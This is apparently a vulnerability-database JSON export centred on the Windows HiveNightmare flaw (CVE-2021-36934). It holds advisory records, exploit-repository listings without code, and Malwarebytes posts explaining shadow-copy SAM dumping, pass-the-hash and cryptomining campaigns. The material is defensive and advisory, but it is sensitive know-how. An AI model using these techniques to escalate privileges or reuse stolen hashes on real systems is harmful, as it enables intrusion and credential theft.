6.4, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-36934"], "modified": "2021-08-04T10:47:55", "id": "158640B4-C919-5413-ABA9-DF7D5AE3CC11", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:06:02", "description": "# CVE-2021-36934\nSeriousSAM Auto Exploiter\n\n# Requirements\n- Hiv...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-01T19:54:31", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-04-20T08:36:49", "id": "73C3C634-4118-5E8F-A7A7-ADE9356507EC", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:54:16", "description": "# CVE-2021-36934\nCVE-2021-36934 HiveNightmare vulnerability chec...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-29T20:35:22", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-30T12:29:18", "id": "E1AF9415-BECF-5F8A-9233-786A0F50E149", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:52:49", "description": "# CVE-2021-36934\nCVE-2021-36934 PowerShell Fix\n\nThis powershell ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T12:24:24", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-29T06:47:23", "id": "F58F44AB-5B59-54F5-9E8E-9095AC51C919", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:55:28", "description": "# CVE-2021-36934\n. Microsoft Windows is vulnerable to an access control error, which stems from an elevation of privilege vulnerability because the system has an overly loose access control list for multiple system files. An attacker could exploit this vulnerability to run arbitrary code using SYSTEM privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-23T00:00:00", "type": "cnvd", "title": "Microsoft Windows Access Control Error Vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": 
"2021-08-01T00:00:00", "id": "CNVD-2021-57182", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-57182", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2023-05-23T16:35:57", "description": "An elevation of privilege vulnerability exists because of overly permissive Access Control Lists (ACLs) on multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker must have the ability to execute code on a victim system to exploit this vulnerability.\n\nAfter installing this security update, you _must_ manually delete all shadow copies of system files, including the SAM database, to fully mitigate this vulnerability. **Simply installing this security update will not fully mitigate this vulnerability.** See [KB5005357- Delete Volume Shadow Copies](<https://support.microsoft.com/topic/1ceaa637-aaa3-4b58-a48b-baf72a2fa9e7>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T07:00:00", "type": "mscve", "title": "Windows Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, 
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-12T07:00:00", "id": "MS:CVE-2021-36934", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36934", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:48:31", "description": "A remote code execution vulnerability exists in Microsoft Office that could be exploited when a user opens a file containing a malformed graphics image or when a user inserts a malformed graphics image into an Office file. Such a file could also be included in an email attachment. An attacker could exploit the vulnerability by constructing a specially crafted EPS file that could allow remote code execution. An attacker who successfully exploited this vulnerability could take control of the affected system.\n\nThis vulnerability could not be exploited automatically through a Web-based attack scenario. An attacker could host a specially crafted website containing an Office file that is designed to exploit the vulnerability, and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements by adding specially crafted content that could exploit the vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by getting them to click a link in an instant messenger or email message that takes users to the attacker's website, or by getting them to open an attachment sent through email.\n\nWorkstations and terminal servers that have Microsoft Office installed are primarily at risk. 
Servers could be at more risk if administrators allow users to log on to servers and to run programs. However, best practices strongly discourage allowing this.\n\nWhen this fix was published, Microsoft had received reports of limited targeted attacks using this vulnerability.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mscve", "title": "Microsoft Office Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0262"], "modified": "2017-05-10T07:00:00", "id": "MS:CVE-2017-0262", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0262", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:48:31", "description": "An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0263"], "modified": "2017-05-11T07:00:00", "id": "MS:CVE-2017-0263", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0263", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2023-05-23T16:31:06", "description": "### *Detect date*:\n07/20/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nAn elevation of privilege vulnerability was found in Microsoft Windows. 
Malicious users can exploit this vulnerability to gain privileges.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 21H1 for ARM64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-36934](<https://nvd.nist.gov/vuln/detail/CVE-2021-36934>) \n\n\n### *Impacts*:\nPE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-36934](<https://vulners.com/cve/CVE-2021-36934>)4.6Warning", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T00:00:00", "type": "kaspersky", "title": "KLA12242 PE vulnerability in 
Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-04T00:00:00", "id": "KLA12242", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12242/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T16:31:08", "description": "### *Detect date*:\n07/20/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nAn elevation of privilege vulnerability was found in Microsoft Windows. Malicious users can exploit this vulnerability to gain privileges.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. 
[More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1909 for x64-based Systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2019 \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 Version 1809 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-36934](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-36934>) \n\n\n### *Impacts*:\nPE \n\n### *Related products*:\n[Microsoft Windows Server](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Server/>)\n\n### *CVE-IDS*:\n[CVE-2021-36934](<https://vulners.com/cve/CVE-2021-36934>)4.6Warning\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T00:00:00", "type": "kaspersky", "title": 
"KLA12239 PE vulnerability in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-04T00:00:00", "id": "KLA12239", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12239/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-28T02:50:28", "description": "### *Detect date*:\n04/14/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nAn unspecified vulnerability was found in Microsoft products. By exploiting this vulnerability malicious users can execute arbitrary code. 
This vulnerability can be exploited remotely via a specially designed HTTP request.\n\n### *Affected products*:\nWindows 7 x86, x64 Service Pack 1 \nWindows Server 2008 R2 x64, Itanium Service Pack 1 \nWindows 8 x86, x64 \nWindows 8.1 x86, x64 \nWindows Server 2012, 2012 R2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[MS15-034](<https://technet.microsoft.com/en-us/library/security/ms15-034>) \n[CVE-2015-1635](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1635>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Server 2012](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2012/>)\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[3042553](<http://support.microsoft.com/kb/3042553>)\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:", "cvss3": {}, "published": "2015-04-14T00:00:00", "type": "kaspersky", "title": "KLA10550 Code execution vulnerability in Microsoft HTTPS.sys", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1635"], "modified": "2020-06-18T00:00:00", "id": "KLA10550", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10550/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-07-31T08:36:55", "description": "Users with low 
privileges can access sensitive Registry database files on Windows 10 and Windows 11, leaving them vulnerable to a local elevation of privilege vulnerability known as SeriousSAM or HiveNightmare.\n\nDoesn't sound serious? Reassured that users must already have access to the system and be able to execute code on said system to use this vulnerability? Don't be.\n\nUsing SeriousSAM, a user can access multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. The attacker would then have full control, which means they can install programs, view, change, or delete data, and create new accounts with full user rights. Which is exactly what an attacker wants.\n\n### My mama said\n\nSAM stands for Security Accounts Manager and it is supposed to be a protected database that can only be accessed by users with Administrator privileges. This was designed as such because the database contains the hashed passwords for all users on a system.\n\nNow, I\u2019ve always been taught that anyone with physical access to your system, and enough knowledge, can take it over. One of the reasons why this is true is that the \u201cholder\u201d of the system can dump those sensitive Registry database files _when Windows is not running_. \n\nWhen Windows is not running the registry is not \u201cmounted\u201d and the "access violation" protection is inactive, since to another operating system (OS) they are just files like any other. You can see the caveat there. You need to look at the files from an external OS to pull this off. (I will leave the \u201chow to\u201d do that to your imagination.)\n\nWhile dumping a registry hive from an inactive Windows machine like that may sound daunting to some, and difficult for malware to pull off, SeriousSAM makes it much easier. 
SeriousSAM removes the need for that external OS, and for Windows to be off, making it a much more achievable trick. It allows users (or malicious programs inadvertently run by those users) to bypass the "access violation" protection on the computer they're using, while it's running.\n\n### Pass the hash\n\n"But the passwords are hashed!", I heard you thinking. In that case, meet pass-the-hash attacks. Windows NT LAN Manager (NTLM) is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain. When the client requests access to a service associated with the domain, the service sends a challenge to the client, requiring the client to perform a mathematical operation using its authentication token, and then return the result of this operation to the service. The service may validate the result or send it to the Domain Controller (DC) for validation. If the service or DC confirm that the client\u2019s response is correct, the service allows access to the client. Sounds secure, right? Well, the fun part is that with the hash you have enough information to perform that \u201cmathematical operation\u201d required to gain access. The authentication process does not require the plaintext password. The hash is enough. \n\nSo, _pass the hash_ is the name for a technique that allows an attacker to authenticate to a remote server or service by using the hash of a user's password, instead of requiring the associated plaintext password as is normally the case.\n\n### Made easy\n\nThe vulnerability we have been referring to as SeriousSAM is listed as [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>) and while it is unclear exactly which versions of Windows are vulnerable, it looks as if some versions of Windows 10 and all versions of Windows 11 are affected, as long as System Protection, aka Shadow Volumes, is enabled. 
The Microsoft advisory says "\u2026we can confirm that this issue affects Windows 10 version 1809 and newer operating systems". The company is researching the issue and we will update this post once we know more.\n\nThe vulnerability got its other name, HiveNightmare, because it affects registry hives, and as a reference to the recently discovered [PrintNightmare](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) vulnerabilities in the Windows Print Spooler service. I think it's a better name for this vulnerability because SAM is not the only sensitive Registry database that's affected. Others are all stored in the `%windir%\\system32\\config` folder, as is SAM. They are SYSTEM, SECURITY, DEFAULT, and SOFTWARE. Which means there might be more options for hackers with limited access to raise privileges or achieve remote code execution waiting to be found.\n\nThe underlying problem is, in Microsoft's own words "overly permissive Access Control Lists (ACLs) on multiple system files". Those lax permissions are carried over into the Shadow copies where the files are unmounted and as unprotected as the files on the dormant computer my mother warned me about. So, any user can dump the database from the Shadow copy and as such create a readable database.\n\nShadow Volumes are enabled by default so that doesn\u2019t bring the number of systems at risk down a lot. It is a useful option, but in this case it is also what enables this vulnerability. \n\n### Mitigation\n\nWhile Microsoft is expected to come up with an out-of-band patch for this vulnerability, there are some things you can do to defeat the vulnerability. 
Whatever you do to address the problem, note that fixing the cause does not necessarily fix broken permissions in shadow copies you have already taken.\n\nYou can find some useful commands for discovering if your systems have Shadow copies enabled, and whether they are vulnerable in the [CERT advisory](<https://www.kb.cert.org/vuls/id/506989>). The advisory notes that "simply having a system drive that is larger than 128GB in size and then performing a Windows Update or installing an MSI will ensure that a VSS shadow copy will be automatically created."\n\nMicrosoft recommends restricting access to the problematic folder and deleting Volume Shadow Copy Service (VSS) shadow copies to mitigate this issue.\n\n**Restrict access to the contents of `%windir%\\system32\\config`**\n\n * Open Command Prompt or Windows PowerShell as an administrator.\n * Run this command: icacls %windir%\\system32\\config\\\\*.* /inheritance:e\n\n**Delete Volume Shadow Copy Service (VSS) shadow copies**\n\n * Delete any System Restore points and Shadow volumes that existed prior to restricting access to `%windir%\\system32\\config`.\n * Create a new System Restore point (if desired).\n\n**Note: Deleting shadow copies could impact restore operations, including the ability to restore data with third-party backup applications.**\n\nThe post [HiveNightmare zero-day lets anyone be SYSTEM on Windows 10 and 11](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/hivenightmare-zero-day-lets-anyone-be-system-on-windows-10-and-11/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-07-21T14:31:50", "type": "malwarebytes", "title": "HiveNightmare zero-day lets anyone be SYSTEM on Windows 10 and 11", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-21T14:31:50", "id": "MALWAREBYTES:17B7F98583E0297FC4ECAB159A115DB9", "href": 
"https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/hivenightmare-zero-day-lets-anyone-be-system-on-windows-10-and-11/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-02-26T16:50:59", "description": "While cryptocurrencies have been around for a long time and used for legitimate purposes, online criminals have certainly tarnished their reputation. Unfortunately, the same benefits offered by these decentralized and somewhat anonymous digital currencies were quickly abused to extort money, as was the case during the various ransomware outbreaks we\u2019ve witnessed in the last few years.\n\nAs the value of cryptocurrencies\u2014driven by the phenomenal rise of Bitcoin\u2014has increased significantly, a new kind of threat has become mainstream, and some might say has even surpassed all other cybercrime. Indeed, cryptocurrency mining is such a lucrative business that malware creators and distributors the world over are drawn to it like moths to a flame. The emergence of a multitude of new cryptocurrencies that can be mined by average computers has also contributed to the widespread abuse we are witnessing.\n\nMalwarebytes has been blocking coin miners with its multiple protection modules, including our real-time scanner and web protection technology. Ever since September 2017, malicious cryptomining has been our top detection overall.\n\n### Cryptomining malware\n\nTo maximize their profits, threat actors are leveraging the computing power of as many devices as they can. 
But first, they must find ways to deliver the malicious coin miners on a large enough scale.\n\nWhile the Wannacry ransomware was highly publicized for taking advantage of the leaked EternalBlue and DoublePulsar exploits, at least [two different groups](<https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators>) used those same vulnerabilities to infect hundreds of thousands of Windows servers with a cryptocurrency miner, ultimately generating millions of dollars in revenue.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/IP__scan-1.png> \"\" )\n\n_Figure 1: Worm scanning random IP addresses on port 445 _\n\nOther vulnerabilities, such as a flaw with Oracle's WebLogic Server ([CVE-2017-10271](<https://www.cvedetails.com/cve/CVE-2017-10271/>)), were also used to deliver miners onto servers at [universities and research institutions](<https://www.ren-isac.net/public-resources/alerts/REN-ISAC_ADVISORY_Oracle_WebLogic_Vulnerability_Bitcoin_Miner_Attacks_20180105v1.pdf>). While Oracle released a [patch](<https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html>) in October 2017, many did not apply it in a timely fashion, and a [PoC](<https://github.com/Luffin/CVE-2017-10271>) only facilitated widespread abuse.\n\nAs it turns out, servers happen to be a favorite among criminals because they offer the most horsepower, or to use the proper term, the highest hash rate to crunch through and solve the mathematical operations required by cryptomining. In recent times, we saw individuals who, against their better judgement, took this to the next level by using supercomputers in various [critical infrastructure](<https://www.wired.com/story/cryptojacking-critical-infrastructure/>) environments.\n\n### Spam and exploit kits campaigns\n\nEven malware authors have caught the cryptocurrency bug. 
